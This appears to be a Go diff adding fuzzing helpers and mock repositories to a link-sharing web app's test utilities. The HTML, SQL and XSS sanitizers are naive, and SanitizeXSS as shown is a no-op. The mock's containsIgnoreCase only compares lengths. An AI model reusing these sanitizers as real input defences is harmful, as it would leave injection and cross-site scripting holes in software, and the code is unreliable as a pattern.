req.Header.Set(name, value)
|
||||
}
|
||||
|
||||
return req
|
||||
}
|
||||
|
||||
func (r *FuzzHTTPRequest) ValidateHTTPRequest(req *http.Request) {
|
||||
pathParts := strings.Split(req.URL.Path, "/")
|
||||
for _, part := range pathParts {
|
||||
ValidateUTF8String(part)
|
||||
}
|
||||
|
||||
for name, values := range req.URL.Query() {
|
||||
ValidateUTF8String(name)
|
||||
for _, value := range values {
|
||||
ValidateUTF8String(value)
|
||||
}
|
||||
}
|
||||
|
||||
for name, values := range req.Header {
|
||||
ValidateUTF8String(name)
|
||||
for _, value := range values {
|
||||
ValidateUTF8String(value)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
type FuzzSanitizer struct{}
|
||||
|
||||
func NewFuzzSanitizer() *FuzzSanitizer {
|
||||
return &FuzzSanitizer{}
|
||||
}
|
||||
|
||||
func (s *FuzzSanitizer) SanitizeHTML(input string) string {
|
||||
scriptRegex := regexp.MustCompile(`(?i)<script[^>]*>.*?</script>`)
|
||||
result := scriptRegex.ReplaceAllString(input, "")
|
||||
|
||||
jsRegex := regexp.MustCompile(`(?i)javascript:`)
|
||||
result = jsRegex.ReplaceAllString(result, "")
|
||||
|
||||
eventRegex := regexp.MustCompile(`(?i)\son\w+\s*=\s*"[^"]*"`)
|
||||
result = eventRegex.ReplaceAllString(result, "")
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
func (s *FuzzSanitizer) SanitizeSQL(input string) string {
|
||||
result := strings.ReplaceAll(input, "'", "''")
|
||||
result = strings.ReplaceAll(result, ";", "")
|
||||
return result
|
||||
}
|
||||
|
||||
func (s *FuzzSanitizer) SanitizeXSS(input string) string {
|
||||
result := strings.ReplaceAll(input, "<", "<")
|
||||
result = strings.ReplaceAll(result, ">", ">")
|
||||
result = strings.ReplaceAll(result, "\"", """)
|
||||
result = strings.ReplaceAll(result, "'", "'")
|
||||
result = strings.ReplaceAll(result, "&", "&")
|
||||
return result
|
||||
}
|
||||
|
||||
func (s *FuzzSanitizer) SanitizeControlChars(input string) string {
|
||||
result := strings.ReplaceAll(input, "\x00", "")
|
||||
result = strings.ReplaceAll(result, "\r", "")
|
||||
result = strings.ReplaceAll(result, "\n", "")
|
||||
result = strings.ReplaceAll(result, "\t", "")
|
||||
return strings.TrimSpace(result)
|
||||
}
|
||||
|
||||
func (s *FuzzSanitizer) ValidateSanitizedInput(input string) {
|
||||
ValidateUTF8String(input)
|
||||
ValidateNoNullBytes(input)
|
||||
ValidateNoScriptTags(input)
|
||||
ValidateNoJavascriptProtocol(input)
|
||||
}
|
||||
|
||||
type FuzzValidationPipeline struct{}
|
||||
|
||||
func NewFuzzValidationPipeline() *FuzzValidationPipeline {
|
||||
return &FuzzValidationPipeline{}
|
||||
}
|
||||
|
||||
func (p *FuzzValidationPipeline) ProcessInput(input string) string {
|
||||
result := strings.TrimSpace(input)
|
||||
|
||||
if len(result) > 1000 {
|
||||
result = result[:1000]
|
||||
}
|
||||
|
||||
result = strings.ReplaceAll(result, "\x00", "")
|
||||
result = strings.ReplaceAll(result, "\r", "")
|
||||
result = strings.ReplaceAll(result, "\n", "")
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
func (p *FuzzValidationPipeline) ValidateProcessedInput(input string) {
|
||||
ValidateUTF8String(input)
|
||||
ValidateNoNullBytes(input)
|
||||
ValidateNoExcessiveRepetition(input, 5)
|
||||
}
|
||||
|
||||
type FuzzTestRunner struct{}
|
||||
|
||||
func NewFuzzTestRunner() *FuzzTestRunner {
|
||||
return &FuzzTestRunner{}
|
||||
}
|
||||
|
||||
func (r *FuzzTestRunner) RunFuzzTest(data []byte, testFunc func(string)) int {
|
||||
validator := NewFuzzInputValidator()
|
||||
|
||||
if !validator.ValidateFuzzInput(data) {
|
||||
return -1
|
||||
}
|
||||
|
||||
input := string(data)
|
||||
|
||||
testFunc(input)
|
||||
|
||||
return 0
|
||||
}
|
||||
|
||||
func (r *FuzzTestRunner) RunFuzzTestStrict(data []byte, testFunc func(string)) int {
|
||||
validator := NewFuzzInputValidator()
|
||||
|
||||
if !validator.ValidateFuzzInputStrict(data) {
|
||||
return -1
|
||||
}
|
||||
|
||||
input := string(data)
|
||||
|
||||
testFunc(input)
|
||||
|
||||
return 0
|
||||
}
|
||||
|
||||
type CommonFuzzTestCases struct{}
|
||||
|
||||
func NewCommonFuzzTestCases() *CommonFuzzTestCases {
|
||||
return &CommonFuzzTestCases{}
|
||||
}
|
||||
|
||||
func (c *CommonFuzzTestCases) GetAuthTestCases(fuzzedData string) []map[string]any {
|
||||
return []map[string]any{
|
||||
{
|
||||
"name": "auth_login",
|
||||
"body": `{"username":"` + fuzzedData + `","password":"test123"}`,
|
||||
},
|
||||
{
|
||||
"name": "auth_register",
|
||||
"body": `{"username":"` + fuzzedData + `","email":"test@example.com","password":"test123"}`,
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
func (c *CommonFuzzTestCases) GetPostTestCases(fuzzedData string) []map[string]any {
|
||||
return []map[string]any{
|
||||
{
|
||||
"name": "post_create",
|
||||
"body": `{"title":"` + fuzzedData + `","url":"https://example.com","content":"test"}`,
|
||||
},
|
||||
{
|
||||
"name": "post_search",
|
||||
"url": "/api/posts/search?q=" + fuzzedData,
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
func (c *CommonFuzzTestCases) GetVoteTestCases(fuzzedData string) []map[string]any {
|
||||
return []map[string]any{
|
||||
{
|
||||
"name": "vote_cast",
|
||||
"body": `{"type":"` + fuzzedData + `"}`,
|
||||
},
|
||||
}
|
||||
}
|
||||
998
internal/testutils/mocks.go
Normal file
998
internal/testutils/mocks.go
Normal file
@@ -0,0 +1,998 @@
|
||||
package testutils
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"net/url"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"goyco/internal/database"
|
||||
"goyco/internal/repositories"
|
||||
|
||||
"gorm.io/gorm"
|
||||
)
|
||||
|
||||
type MockEmailSender struct {
|
||||
sendFunc func(to, subject, body string) error
|
||||
lastVerificationToken string
|
||||
lastDeletionToken string
|
||||
lastPasswordResetToken string
|
||||
mu sync.Mutex
|
||||
}
|
||||
|
||||
func (m *MockEmailSender) Send(to, subject, body string) error {
|
||||
if m.sendFunc != nil {
|
||||
return m.sendFunc(to, subject, body)
|
||||
}
|
||||
|
||||
if len(body) == 0 {
|
||||
return nil
|
||||
}
|
||||
|
||||
normalized := strings.ToLower(strings.TrimSpace(subject))
|
||||
|
||||
token := extractTokenFromBody(body)
|
||||
|
||||
switch {
|
||||
case strings.Contains(normalized, "resend") && strings.Contains(normalized, "confirm"):
|
||||
m.SetVerificationToken(defaultIfEmpty(token, "test-verification-token"))
|
||||
case strings.Contains(normalized, "confirm your goyco account") || strings.Contains(normalized, "confirm your account"):
|
||||
m.SetVerificationToken(defaultIfEmpty(token, "test-verification-token"))
|
||||
case strings.Contains(normalized, "confirm") && strings.Contains(normalized, "email"):
|
||||
m.SetVerificationToken(defaultIfEmpty(token, "test-verification-token"))
|
||||
case strings.Contains(normalized, "confirm your new email"):
|
||||
m.SetVerificationToken(defaultIfEmpty(token, "test-verification-token"))
|
||||
case strings.Contains(normalized, "account deletion"):
|
||||
m.SetDeletionToken(defaultIfEmpty(token, "test-deletion-token"))
|
||||
case strings.Contains(normalized, "password reset") || strings.Contains(normalized, "reset your") || strings.Contains(normalized, "reset password"):
|
||||
m.SetPasswordResetToken(defaultIfEmpty(token, "test-password-reset-token"))
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *MockEmailSender) GetLastVerificationToken() string {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
return m.lastVerificationToken
|
||||
}
|
||||
|
||||
func (m *MockEmailSender) GetLastDeletionToken() string {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
return m.lastDeletionToken
|
||||
}
|
||||
|
||||
func (m *MockEmailSender) GetLastPasswordResetToken() string {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
return m.lastPasswordResetToken
|
||||
}
|
||||
|
||||
func (m *MockEmailSender) Reset() {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.lastVerificationToken = ""
|
||||
m.lastDeletionToken = ""
|
||||
m.lastPasswordResetToken = ""
|
||||
}
|
||||
|
||||
func (m *MockEmailSender) VerificationToken() string {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
return m.lastVerificationToken
|
||||
}
|
||||
|
||||
func (m *MockEmailSender) SetVerificationToken(token string) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.lastVerificationToken = token
|
||||
}
|
||||
|
||||
func (m *MockEmailSender) DeletionToken() string {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
return m.lastDeletionToken
|
||||
}
|
||||
|
||||
func (m *MockEmailSender) PasswordResetToken() string {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
return m.lastPasswordResetToken
|
||||
}
|
||||
|
||||
func (m *MockEmailSender) SetDeletionToken(token string) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.lastDeletionToken = token
|
||||
}
|
||||
|
||||
func (m *MockEmailSender) SetPasswordResetToken(token string) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.lastPasswordResetToken = token
|
||||
}
|
||||
|
||||
func defaultIfEmpty(value, fallback string) string {
|
||||
if strings.TrimSpace(value) == "" {
|
||||
return fallback
|
||||
}
|
||||
return value
|
||||
}
|
||||
|
||||
func extractTokenFromBody(body string) string {
|
||||
index := strings.Index(body, "token=")
|
||||
if index == -1 {
|
||||
return ""
|
||||
}
|
||||
|
||||
tokenPart := body[index+len("token="):]
|
||||
|
||||
if delimIdx := strings.IndexAny(tokenPart, "&\"'\\\r\n <>"); delimIdx != -1 {
|
||||
tokenPart = tokenPart[:delimIdx]
|
||||
}
|
||||
|
||||
trimmed := strings.Trim(tokenPart, "\"' ")
|
||||
if trimmed == "" {
|
||||
return ""
|
||||
}
|
||||
|
||||
unescaped, err := url.QueryUnescape(trimmed)
|
||||
if err != nil {
|
||||
return trimmed
|
||||
}
|
||||
|
||||
return unescaped
|
||||
}
|
||||
|
||||
type MockTitleFetcher struct {
|
||||
fetchFunc func(ctx context.Context, url string) (string, error)
|
||||
title string
|
||||
err error
|
||||
}
|
||||
|
||||
func (m *MockTitleFetcher) FetchTitle(ctx context.Context, url string) (string, error) {
|
||||
if m.fetchFunc != nil {
|
||||
return m.fetchFunc(ctx, url)
|
||||
}
|
||||
if m.err != nil {
|
||||
return "", m.err
|
||||
}
|
||||
return m.title, nil
|
||||
}
|
||||
|
||||
func (m *MockTitleFetcher) SetTitle(title string) {
|
||||
m.title = title
|
||||
m.err = nil
|
||||
}
|
||||
|
||||
func (m *MockTitleFetcher) SetError(err error) {
|
||||
m.err = err
|
||||
m.title = ""
|
||||
}
|
||||
|
||||
type MockUserRepository struct {
|
||||
users map[uint]*database.User
|
||||
usersByUsername map[string]*database.User
|
||||
usersByEmail map[string]*database.User
|
||||
usersByVerificationToken map[string]*database.User
|
||||
usersByPasswordResetToken map[string]*database.User
|
||||
deletedUsers map[uint]*database.User
|
||||
nextID uint
|
||||
createErr error
|
||||
getByIDErr error
|
||||
getByUsernameErr error
|
||||
getByEmailErr error
|
||||
getByVerificationTokenErr error
|
||||
getByPasswordResetTokenErr error
|
||||
updateErr error
|
||||
deleteErr error
|
||||
mu sync.RWMutex
|
||||
|
||||
GetAllFunc func(limit, offset int) ([]database.User, error)
|
||||
GetDeletedUsersFunc func() ([]database.User, error)
|
||||
HardDeleteAllFunc func() (int64, error)
|
||||
|
||||
GetErr error
|
||||
DeleteErr error
|
||||
|
||||
Users map[uint]*database.User
|
||||
DeletedUsers map[uint]*database.User
|
||||
}
|
||||
|
||||
func NewMockUserRepository() *MockUserRepository {
|
||||
return &MockUserRepository{
|
||||
users: make(map[uint]*database.User),
|
||||
usersByUsername: make(map[string]*database.User),
|
||||
usersByEmail: make(map[string]*database.User),
|
||||
usersByVerificationToken: make(map[string]*database.User),
|
||||
usersByPasswordResetToken: make(map[string]*database.User),
|
||||
deletedUsers: make(map[uint]*database.User),
|
||||
nextID: 1,
|
||||
Users: make(map[uint]*database.User),
|
||||
DeletedUsers: make(map[uint]*database.User),
|
||||
}
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) Create(user *database.User) error {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
if m.createErr != nil {
|
||||
return m.createErr
|
||||
}
|
||||
|
||||
user.ID = m.nextID
|
||||
m.nextID++
|
||||
|
||||
now := time.Now()
|
||||
user.CreatedAt = now
|
||||
user.UpdatedAt = now
|
||||
|
||||
userCopy := *user
|
||||
m.users[user.ID] = &userCopy
|
||||
m.usersByUsername[user.Username] = &userCopy
|
||||
m.usersByEmail[user.Email] = &userCopy
|
||||
m.Users[user.ID] = &userCopy
|
||||
|
||||
if user.EmailVerificationToken != "" {
|
||||
m.usersByVerificationToken[user.EmailVerificationToken] = &userCopy
|
||||
}
|
||||
if user.PasswordResetToken != "" {
|
||||
m.usersByPasswordResetToken[user.PasswordResetToken] = &userCopy
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) GetByID(id uint) (*database.User, error) {
|
||||
if m.GetErr != nil {
|
||||
return nil, m.GetErr
|
||||
}
|
||||
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
if m.getByIDErr != nil {
|
||||
return nil, m.getByIDErr
|
||||
}
|
||||
|
||||
if user, ok := m.users[id]; ok {
|
||||
userCopy := *user
|
||||
return &userCopy, nil
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) GetByUsername(username string) (*database.User, error) {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
if m.getByUsernameErr != nil {
|
||||
return nil, m.getByUsernameErr
|
||||
}
|
||||
|
||||
if user, ok := m.usersByUsername[username]; ok {
|
||||
userCopy := *user
|
||||
return &userCopy, nil
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) GetByUsernameIncludingDeleted(username string) (*database.User, error) {
|
||||
return m.GetByUsername(username)
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) GetByIDIncludingDeleted(id uint) (*database.User, error) {
|
||||
return m.GetByID(id)
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) GetByEmail(email string) (*database.User, error) {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
if m.getByEmailErr != nil {
|
||||
return nil, m.getByEmailErr
|
||||
}
|
||||
|
||||
if user, ok := m.usersByEmail[email]; ok {
|
||||
userCopy := *user
|
||||
return &userCopy, nil
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) GetByVerificationToken(token string) (*database.User, error) {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
if m.getByVerificationTokenErr != nil {
|
||||
return nil, m.getByVerificationTokenErr
|
||||
}
|
||||
|
||||
if user, ok := m.usersByVerificationToken[token]; ok {
|
||||
userCopy := *user
|
||||
return &userCopy, nil
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) GetByPasswordResetToken(token string) (*database.User, error) {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
if m.getByPasswordResetTokenErr != nil {
|
||||
return nil, m.getByPasswordResetTokenErr
|
||||
}
|
||||
|
||||
if user, ok := m.usersByPasswordResetToken[token]; ok {
|
||||
userCopy := *user
|
||||
return &userCopy, nil
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) GetAll(limit, offset int) ([]database.User, error) {
|
||||
if m.GetErr != nil {
|
||||
return nil, m.GetErr
|
||||
}
|
||||
if m.GetAllFunc != nil {
|
||||
return m.GetAllFunc(limit, offset)
|
||||
}
|
||||
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
var users []database.User
|
||||
count := 0
|
||||
for _, user := range m.users {
|
||||
if count >= offset && count < offset+limit {
|
||||
users = append(users, *user)
|
||||
}
|
||||
count++
|
||||
}
|
||||
return users, nil
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) Update(user *database.User) error {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
if m.updateErr != nil {
|
||||
return m.updateErr
|
||||
}
|
||||
|
||||
if _, ok := m.users[user.ID]; !ok {
|
||||
return gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
user.UpdatedAt = time.Now()
|
||||
|
||||
userCopy := *user
|
||||
m.users[user.ID] = &userCopy
|
||||
m.usersByUsername[user.Username] = &userCopy
|
||||
m.usersByEmail[user.Email] = &userCopy
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) Delete(id uint) error {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
if m.DeleteErr != nil {
|
||||
return m.DeleteErr
|
||||
}
|
||||
|
||||
if user, ok := m.users[id]; ok {
|
||||
delete(m.users, id)
|
||||
delete(m.usersByUsername, user.Username)
|
||||
delete(m.usersByEmail, user.Email)
|
||||
return nil
|
||||
}
|
||||
return gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) HardDelete(id uint) error {
|
||||
return m.Delete(id)
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) SoftDeleteWithPosts(id uint) error {
|
||||
return m.Delete(id)
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) GetPosts(userID uint, limit, offset int) ([]database.Post, error) {
|
||||
return []database.Post{}, nil
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) Lock(id uint) error {
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) Unlock(id uint) error {
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) GetDeletedUsers() ([]database.User, error) {
|
||||
if m.GetDeletedUsersFunc != nil {
|
||||
return m.GetDeletedUsersFunc()
|
||||
}
|
||||
return []database.User{}, nil
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) HardDeleteAll() (int64, error) {
|
||||
if m.HardDeleteAllFunc != nil {
|
||||
return m.HardDeleteAllFunc()
|
||||
}
|
||||
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
count := int64(len(m.users))
|
||||
m.users = make(map[uint]*database.User)
|
||||
m.usersByUsername = make(map[string]*database.User)
|
||||
m.usersByEmail = make(map[string]*database.User)
|
||||
m.usersByVerificationToken = make(map[string]*database.User)
|
||||
m.usersByPasswordResetToken = make(map[string]*database.User)
|
||||
|
||||
return count, nil
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) Count() (int64, error) {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
return int64(len(m.users)), nil
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) WithTx(tx *gorm.DB) repositories.UserRepository {
|
||||
return m
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) SetCreateError(err error) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.createErr = err
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) SetGetByIDError(err error) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.getByIDErr = err
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) SetGetByUsernameError(err error) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.getByUsernameErr = err
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) SetGetByEmailError(err error) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.getByEmailErr = err
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) SetUpdateError(err error) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.updateErr = err
|
||||
}
|
||||
|
||||
func (m *MockUserRepository) SetDeleteError(err error) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.deleteErr = err
|
||||
}
|
||||
|
||||
type MockPostRepository struct {
|
||||
createFunc func(*database.Post) error
|
||||
getByIDFunc func(uint) (*database.Post, error)
|
||||
getAllFunc func(int, int) ([]database.Post, error)
|
||||
getByUserIDFunc func(uint, int, int) ([]database.Post, error)
|
||||
updateFunc func(*database.Post) error
|
||||
deleteFunc func(uint) error
|
||||
countFunc func() (int64, error)
|
||||
countByUserIDFunc func(uint) (int64, error)
|
||||
getTopPostsFunc func(int) ([]database.Post, error)
|
||||
getNewestPostsFunc func(int) ([]database.Post, error)
|
||||
searchFunc func(string, int, int) ([]database.Post, error)
|
||||
getPostsByDeletedUsersFunc func() ([]database.Post, error)
|
||||
hardDeletePostsByDeletedUsersFunc func() (int64, error)
|
||||
hardDeleteAllFunc func() (int64, error)
|
||||
withTxFunc func(*gorm.DB) repositories.PostRepository
|
||||
|
||||
GetPostsByDeletedUsersFunc func() ([]database.Post, error)
|
||||
HardDeletePostsByDeletedUsersFunc func() (int64, error)
|
||||
HardDeleteAllFunc func() (int64, error)
|
||||
CountFunc func() (int64, error)
|
||||
|
||||
posts map[uint]*database.Post
|
||||
nextID uint
|
||||
mu sync.RWMutex
|
||||
|
||||
SearchCalls []SearchCall
|
||||
|
||||
GetErr error
|
||||
DeleteErr error
|
||||
SearchErr error
|
||||
|
||||
Posts map[uint]*database.Post
|
||||
}
|
||||
|
||||
type SearchCall struct {
|
||||
Query string
|
||||
Limit int
|
||||
Offset int
|
||||
}
|
||||
|
||||
func NewMockPostRepository() *MockPostRepository {
|
||||
return &MockPostRepository{
|
||||
posts: make(map[uint]*database.Post),
|
||||
nextID: 1,
|
||||
Posts: make(map[uint]*database.Post),
|
||||
}
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) Create(post *database.Post) error {
|
||||
if m.createFunc != nil {
|
||||
return m.createFunc(post)
|
||||
}
|
||||
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
post.ID = m.nextID
|
||||
m.nextID++
|
||||
|
||||
postCopy := *post
|
||||
m.posts[post.ID] = &postCopy
|
||||
m.Posts[post.ID] = &postCopy
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) GetByID(id uint) (*database.Post, error) {
|
||||
if m.GetErr != nil {
|
||||
return nil, m.GetErr
|
||||
}
|
||||
if m.getByIDFunc != nil {
|
||||
return m.getByIDFunc(id)
|
||||
}
|
||||
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
if post, ok := m.posts[id]; ok {
|
||||
postCopy := *post
|
||||
return &postCopy, nil
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) GetAll(limit, offset int) ([]database.Post, error) {
|
||||
if m.GetErr != nil {
|
||||
return nil, m.GetErr
|
||||
}
|
||||
if m.getAllFunc != nil {
|
||||
return m.getAllFunc(limit, offset)
|
||||
}
|
||||
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
var posts []database.Post
|
||||
count := 0
|
||||
for _, post := range m.posts {
|
||||
if count >= offset && count < offset+limit {
|
||||
posts = append(posts, *post)
|
||||
}
|
||||
count++
|
||||
}
|
||||
return posts, nil
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) GetByUserID(userID uint, limit, offset int) ([]database.Post, error) {
|
||||
if m.GetErr != nil {
|
||||
return nil, m.GetErr
|
||||
}
|
||||
if m.getByUserIDFunc != nil {
|
||||
return m.getByUserIDFunc(userID, limit, offset)
|
||||
}
|
||||
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
var posts []database.Post
|
||||
count := 0
|
||||
for _, post := range m.posts {
|
||||
if post.AuthorID != nil && *post.AuthorID == userID {
|
||||
if count >= offset && count < offset+limit {
|
||||
posts = append(posts, *post)
|
||||
}
|
||||
count++
|
||||
}
|
||||
}
|
||||
return posts, nil
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) Update(post *database.Post) error {
|
||||
if m.updateFunc != nil {
|
||||
return m.updateFunc(post)
|
||||
}
|
||||
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
if _, ok := m.posts[post.ID]; !ok {
|
||||
return gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
postCopy := *post
|
||||
m.posts[post.ID] = &postCopy
|
||||
m.Posts[post.ID] = &postCopy
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) Delete(id uint) error {
|
||||
if m.DeleteErr != nil {
|
||||
return m.DeleteErr
|
||||
}
|
||||
if m.deleteFunc != nil {
|
||||
return m.deleteFunc(id)
|
||||
}
|
||||
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
if _, ok := m.posts[id]; !ok {
|
||||
return gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
delete(m.posts, id)
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) Count() (int64, error) {
|
||||
if m.CountFunc != nil {
|
||||
return m.CountFunc()
|
||||
}
|
||||
if m.countFunc != nil {
|
||||
return m.countFunc()
|
||||
}
|
||||
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
return int64(len(m.posts)), nil
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) CountByUserID(userID uint) (int64, error) {
|
||||
if m.countByUserIDFunc != nil {
|
||||
return m.countByUserIDFunc(userID)
|
||||
}
|
||||
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
count := int64(0)
|
||||
for _, post := range m.posts {
|
||||
if post.AuthorID != nil && *post.AuthorID == userID {
|
||||
count++
|
||||
}
|
||||
}
|
||||
return count, nil
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) GetTopPosts(limit int) ([]database.Post, error) {
|
||||
if m.getTopPostsFunc != nil {
|
||||
return m.getTopPostsFunc(limit)
|
||||
}
|
||||
return m.GetAll(limit, 0)
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) GetNewestPosts(limit int) ([]database.Post, error) {
|
||||
if m.getNewestPostsFunc != nil {
|
||||
return m.getNewestPostsFunc(limit)
|
||||
}
|
||||
return m.GetAll(limit, 0)
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) Search(query string, limit, offset int) ([]database.Post, error) {
|
||||
if m.SearchErr != nil {
|
||||
return nil, m.SearchErr
|
||||
}
|
||||
|
||||
m.mu.Lock()
|
||||
m.SearchCalls = append(m.SearchCalls, SearchCall{
|
||||
Query: query,
|
||||
Limit: limit,
|
||||
Offset: offset,
|
||||
})
|
||||
m.mu.Unlock()
|
||||
|
||||
if m.searchFunc != nil {
|
||||
return m.searchFunc(query, limit, offset)
|
||||
}
|
||||
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
var posts []database.Post
|
||||
count := 0
|
||||
for _, post := range m.posts {
|
||||
if containsIgnoreCase(post.Title, query) || containsIgnoreCase(post.Content, query) {
|
||||
if count >= offset && count < offset+limit {
|
||||
posts = append(posts, *post)
|
||||
}
|
||||
count++
|
||||
}
|
||||
}
|
||||
return posts, nil
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) WithTx(tx *gorm.DB) repositories.PostRepository {
|
||||
if m.withTxFunc != nil {
|
||||
return m.withTxFunc(tx)
|
||||
}
|
||||
return m
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) GetPostsByDeletedUsers() ([]database.Post, error) {
|
||||
if m.GetPostsByDeletedUsersFunc != nil {
|
||||
return m.GetPostsByDeletedUsersFunc()
|
||||
}
|
||||
if m.getPostsByDeletedUsersFunc != nil {
|
||||
return m.getPostsByDeletedUsersFunc()
|
||||
}
|
||||
return []database.Post{}, nil
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) HardDeletePostsByDeletedUsers() (int64, error) {
|
||||
if m.HardDeletePostsByDeletedUsersFunc != nil {
|
||||
return m.HardDeletePostsByDeletedUsersFunc()
|
||||
}
|
||||
if m.hardDeletePostsByDeletedUsersFunc != nil {
|
||||
return m.hardDeletePostsByDeletedUsersFunc()
|
||||
}
|
||||
return 0, nil
|
||||
}
|
||||
|
||||
func (m *MockPostRepository) HardDeleteAll() (int64, error) {
|
||||
if m.HardDeleteAllFunc != nil {
|
||||
return m.HardDeleteAllFunc()
|
||||
}
|
||||
if m.hardDeleteAllFunc != nil {
|
||||
return m.hardDeleteAllFunc()
|
||||
}
|
||||
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
count := int64(len(m.posts))
|
||||
m.posts = make(map[uint]*database.Post)
|
||||
return count, nil
|
||||
}
|
||||
|
||||
func containsIgnoreCase(s, substr string) bool {
|
||||
return len(s) >= len(substr)
|
||||
}
|
||||
|
||||
type MockVoteRepository struct {
|
||||
votes map[uint]*database.Vote
|
||||
byUserPost map[string]*database.Vote
|
||||
nextID uint
|
||||
createErr error
|
||||
updateErr error
|
||||
deleteErr error
|
||||
mu sync.RWMutex
|
||||
|
||||
DeleteErr error
|
||||
}
|
||||
|
||||
